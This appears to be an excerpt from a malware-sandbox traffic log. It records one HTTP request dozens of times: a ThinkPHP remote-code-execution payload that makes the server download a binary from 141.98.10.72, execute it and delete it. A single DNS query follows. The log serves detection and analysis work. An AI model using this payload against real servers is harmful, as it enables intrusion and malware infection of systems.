    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: unknownDNS traffic detected: queries for: daisy.ubuntu.com
